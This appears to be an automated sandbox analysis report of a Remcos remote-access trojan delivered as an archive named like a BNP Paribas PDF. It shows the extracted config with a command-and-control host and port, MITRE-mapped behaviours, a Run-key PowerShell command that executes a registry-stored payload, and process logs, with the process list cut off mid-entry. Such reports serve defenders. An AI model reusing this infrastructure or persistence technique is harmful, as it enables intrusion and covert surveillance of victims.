remcos | hxxps://cdn[.]old[.]server[.]spacebar[.]chat/attachments/1356161307290937543/1358728454371020967/BNPParibaspdf[.]7z

Analysis

max time kernel
148s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
07/04/2025, 10:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.old.server.spacebar.chat/attachments/1356161307290937543/1358728454371020967/BNPParibaspdf.7z

Score

10^/10

remcos megida discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

megida

latestrem.duckdns.org:52190

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-I12ONC
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 6 IoCs

flow	pid	Process
119	1396	WScript.exe
122	5732	powershell.exe
145	2892	msiexec.exe
147	2892	msiexec.exe
150	2892	msiexec.exe
153	2892	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jorddag = "%Rdlg% -windowstyle 1 $Skbnefllesskab=(gi 'HKCU:\\Software\\Unglowering\\').GetValue('Rawlplug');%Rdlg% ($Skbnefllesskab)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5732	powershell.exe
2260	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2892	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2260	powershell.exe
2892	msiexec.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1873409767\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1873409767\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_819464736\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_819464736\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_204678622\nav_config.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1594381566\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_819464736\protocols.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_204678622\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_204678622\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1594381566\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1594381566\office_endpoints_list.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping1052_1594381566\smart_switch_list.json	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884966158190554"	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-805952410-2104024357-1716932545-1000\{EE01808F-F7DB-4B55-B3C4-5DB20CAF9027}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings	7zFM.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
5248	7zFM.exe
5248	7zFM.exe
5732	powershell.exe
5732	powershell.exe
5732	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
5464	msedge.exe
5464	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2660	OpenWith.exe
5248	7zFM.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2260	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	5248	7zFM.exe
Token: 35	5248	7zFM.exe
Token: SeSecurityPrivilege	5248	7zFM.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
5248	7zFM.exe
5248	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe
1052	msedge.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
2660	OpenWith.exe
5516	AcroRd32.exe
5516	AcroRd32.exe
5516	AcroRd32.exe
5516	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1052 wrote to memory of 4472	1052	msedge.exe	86
PID 1052 wrote to memory of 4472	1052	msedge.exe	86
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 4336	1052	msedge.exe	89
PID 1052 wrote to memory of 4336	1052	msedge.exe	89
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 536	1052	msedge.exe	88
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90
PID 1052 wrote to memory of 3344	1052	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.old.server.spacebar.chat/attachments/1356161307290937543/1358728454371020967/BNPParibaspdf.7z
1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7fff5ca6f208,0x7fff5ca6f214,0x7fff5ca6f220
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2192,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:2
  2⤵
  PID:536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1720,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=2480 /prefetch:3
  2⤵
  PID:4336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2640,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=2660 /prefetch:8
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
  2⤵
  PID:4076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=2664,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4328,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4320,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:8
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5376,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5420,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:8
  2⤵
  PID:4016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:8
  2⤵
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6156,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6392,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5796,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:8
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5796,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5828 /prefetch:8
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6864,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6884 /prefetch:8
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6900,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3512,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=7032 /prefetch:8
  2⤵
  PID:1580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7152,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7312,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=7324 /prefetch:8
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7480,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:8
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7640,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4588,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
  2⤵
  PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3668,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3504,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=4472 /prefetch:8
  2⤵
  PID:5172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6424,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=3052 /prefetch:8
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6508,i,8620317850510188419,9894328495597859175,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
